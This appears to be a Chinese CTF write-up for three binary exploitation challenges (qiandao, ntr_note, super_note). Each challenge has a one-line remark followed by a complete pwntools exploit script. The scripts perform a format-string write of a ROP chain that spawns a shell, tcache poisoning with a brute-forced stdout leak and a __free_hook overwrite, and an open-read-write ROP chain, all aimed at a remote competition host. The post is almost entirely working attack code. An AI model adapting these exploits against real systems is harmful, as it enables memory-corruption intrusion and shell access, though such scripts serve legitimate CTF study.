NewCTF
调完了,写的 b 脚本把错误 catch 了一直找不到某个铸币错误,导致调了半天
# qiandao
格式化字符串,写的有点太多了,利用格式化字符串在栈上写 ROP 链
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from galatea import *
#context.log_level = 'debug'
binary = './qiandao'
elf = ELF('./qiandao')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "81.68.86.115"
port = 10001
p = remote(host,port)
l64 = lambda : u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda : u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda a : int( p.recv(len(str(a)))[2:] , 16)
def dbg():
gdb.attach(p)
pause()
gadget = 0xe6c81
#gdb.attach(p,"b printf")
#7 __libc_start_main+243
#7 栈地址
#11 基地址0x82e
payload = "%7$p," + "%11$p," + "%9$p,"
sl(payload)
__libc_start_main = rint("0x7f62b26990b3") - 243
libc_base = __libc_start_main - libc.sym["__libc_start_main"]
p.recvuntil(",")
pie_addr = rint("0x55d2c451e82e") - 0x82e
p.recvuntil(",")
stack_addr = rint("0x7fffa24e6e58") - 0xe0
gadget_addr = gadget + libc_base
'''
lg("__libc_start_main",__libc_start_main)
lg("gadget_addr",gadget_addr)
lg("pie_addr",pie_addr)
lg("stack_addr",stack_addr)
'''
bss_addr = 0x000000000201030 + pie_addr
lg("bss_addr",bss_addr)
#gdb.attach(p,"printf")
payload = "%"+str((stack_addr + 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((bss_addr ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +2 + 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((bss_addr >> 16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "niyah%11$sgalatea"
sl(payload)
p.recvuntil("niyah")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
ret_addr = 0x000000000000065e + pie_addr
pop_rdi_ret_addr = 0x00000000000008f3 + pie_addr
system_addr = libc.sym["system"] + libc_base
lg("ret_addr",ret_addr)
lg("pop_rdi_ret_addr",pop_rdi_ret_addr)
lg("heap_addr",heap_addr)
lg("system_addr",system_addr)
payload = "\x00"*0x100 + "/catflag\x00"
sl(payload)
#gdb.attach(p,"printf")
payload = "%"+str((stack_addr - 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((ret_addr ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +2 - 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((ret_addr >> 16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +4 - 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((ret_addr >> 16 >> 16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr - 0x8 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((pop_rdi_ret_addr ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +2 - 0x8 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((pop_rdi_ret_addr >> 16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +4 - 0x8 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((pop_rdi_ret_addr >> 16>>16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((heap_addr + 0x30 ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr + 2 ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str(((heap_addr + 0x30 )>>16 ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr + 4 ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str(((heap_addr + 0x30 )>>16 >>16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +0x8 ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((system_addr ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr + 2 + 0x8 ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((system_addr >>16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +4 + 0x8) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((system_addr >>16>>16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
#gdb.attach(p,"printf")
#pause()
payload = "61happy\x00".ljust(0x30,"a") + "/bin/sh\x00"
sl(payload)
#payload =
p.interactive()# ntr_note
libc-2.31 没 show,爆破了两次,stdout 进行泄露,脚本 1/256 成功率
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
import galatea
context.update( os = 'linux',timeout = 1)
#context.log_level = 'debug'
binary = 'ntr_note'
elf = ELF('ntr_note')
libc =elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process('./ntr_note')
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "81.68.86.115"
port = "10000"
p = remote(host,port)
l64 = lambda : u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda : u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda a : int( p.recv(len(str(a)))[2:] , 16)
def dbg():
gdb.attach(p)
pause()
def cmd(num):
sla("choice >>",num)
def add(size,content):
cmd(1)
sla("size:",size)
sla("content:",content)
def delete(id):
cmd(2)
sla("idx:",id)
def edit(id,content):
cmd(4)
sla("idx:",id)
sa("content:",content)
def to_pwn():
add(0x50,"aaaa")
add(0x50,"aaaa")
add(0x50,"aaaa")
add(0x50,"aaaa")
delete(1)
delete(2)
edit(2, p16(0x7010))
add(0x50,"") #4
add(0x50,"") #5
#dbg()
edit(5,p64(0)*9 + p64(0x0007000700070007))
delete(5)
add(0x40,"") #6
add(0x40,"") #7
add(0x40,"") #8
delete(6)
delete(7)
edit(7,"\xb0")
add(0x40,"") #9
edit(8,p16(0x26a0))
add(0x40,"") #10
edit(5,p64(0x0001000100010001))
payload = p64(0xfbad1800) + p64(0)*3 + "\x00"
add(0x40,payload) #11
leak = l64()
stdout = leak + 0x336da
libc_base = stdout - libc.sym["_IO_2_1_stdout_"]
system_addr = libc_base + libc.sym["system"]
__free_hook = libc_base + libc.sym["__free_hook"]
__malloc_hook = libc_base + libc.sym["__malloc_hook"]
lg("leak",leak)
lg("stdout",stdout)
lg("__free_hook",__free_hook)
lg("__malloc_hook",__malloc_hook)
add(0x40,"") #12
add(0x40,"") #13
add(0x40,"/bin/sh\x00") #14
delete(12)
delete(13)
edit(13,p64(__free_hook))
add(0x40,"")
add(0x40,p64(system_addr))
delete(14)
p.interactive()
i = 0
while 1:
i += 1
log.warn(str(i))
try:
to_pwn()
except Exception:
p.close()
p = remote(host,port)
continue
# super_note
先爆破 std_out,再在栈上写 ORW,终于会了
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
import galatea
context.update( os = 'linux',timeout = 1)
context.log_level = 'debug'
binary = 'super_note'
elf = ELF('super_note')
libc = elf.libc
context.binary = binary
DEBUG = 1
if DEBUG:
p = process(binary)
#p = process(['qemu-aarch64','-L','',binary])
#p = process(['qemu-aarch64','-L','',-g,'1234',binary])
else:
host = ''
port = ""
p = remote(host,port)
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
l32 = lambda : u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 0x%x' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
rint= lambda a : int( p.recv(len(str(a)))[2:] , 16)
def dbg():
gdb.attach(p)
pause()
def cmd(num):
sla("choice:",num)
def add(id,size):
cmd(1)
sla(":",id)
sla(":",size)
def edit(id,context="aaa"):
cmd(2)
sla(":",id)
sa(":",context)
def show(id):
cmd(3)
sla(":",id)
def delete(id):
cmd(4)
sla(":",id)
def to_pwn():
add(0,0x50)
add(1,0x50)
show(0)
p.recvuntil("address:[")
low_addr = rint('0x1080') - 0x18b0
lg("low_addr",low_addr)
delete(0)
delete(1)
edit(1,p16(low_addr))
#0x8910
#0x7000
#0x18b0
add(0,0x50)
add(1,0x50)
edit(1,p64(0)*9 + p64(0x0007000700070007))
delete(1)
add(2,0x40)
add(3,0x40)
add(4,0x40)
delete(2)
delete(3)
edit(3,"\xb0") #链到4
edit(4,p16(0xd6a0))
add(5,0x40)
add(6,0x40)
edit(1,p64(0x0001000100010001)+p64(0x0))
payload = p64(0xfbad1800) + p64(0)*3 + "\x00"
add(7,0x40)
edit(7,payload)
p.recv(8)
leak = l64()
if leak == 0:
raise EOFError
lg("leak",leak)
#stdout 0xd6a0
offset = 0x7f563057d6a0 - 0x7f563057c980
_IO_2_1_stdout_ = leak + offset
libc_base = _IO_2_1_stdout_ -libc.sym["_IO_2_1_stdout_"]
environ = libc_base + libc.sym['__environ']
lg("environ",environ)
payload = p64(0xfbad1800) + p64(0)*3 + p64(environ-0x10) +p64(environ+0x10)
edit(7,payload)
stack_addr = l64() - 0x120
lg("stack_addr",stack_addr)
add(8,0x60)
delete(8)
edit(8,p64(stack_addr))
add(8,0x60)
add(9,0x60)
read_addr = libc.sym["read"] + libc_base
open_addr = libc.sym["open"] + libc_base
puts_addr = libc.sym["puts"] + libc_base
ret = 0x0000000000025679 + libc_base
syscall = 0X00000000011B70B + libc_base #手找的
pop_rax_ret = 0x000000000004a550 + libc_base
pop_rdi_ret = 0x0000000000026b72 + libc_base
pop_rsi_ret = 0x0000000000027529 + libc_base
pop_rdx_rbx_ret = 0x00000000001626d6 + libc_base
lg("pop_rdi_ret",pop_rdi_ret)
lg("read_addr",read_addr)
#gdb.attach(p,"b *puts")
#pause()
payload = p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(stack_addr) + p64(pop_rdx_rbx_ret) + p64(0x400) +p64(0) + p64(read_addr)
edit(9,payload)
payload_orw = "flag\x00".ljust(0x40,"\x00")
payload_orw+= p64(pop_rax_ret) + p64(2) + p64(pop_rdi_ret) + p64(stack_addr) + p64(pop_rsi_ret) + p64(0) + p64(syscall)
payload_orw+= p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(stack_addr+0x100) + p64(pop_rdx_rbx_ret) + p64(0x100)+ p64(0x100)+p64(read_addr)
payload_orw+= p64(pop_rdi_ret) + p64(stack_addr+0x100) + p64(puts_addr)
#dbg()
sla("done",payload_orw)
p.interactive()
#to_pwn()
i = 0
while 1:
i += 1
log.warn(str(i))
try:
to_pwn()
except Exception:
p.close()
p = process(binary)
continue
'''
@File : super_note.py
@Time : 2021/06/03 19:52:39
@Author : Niyah
'''
本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 进行许可。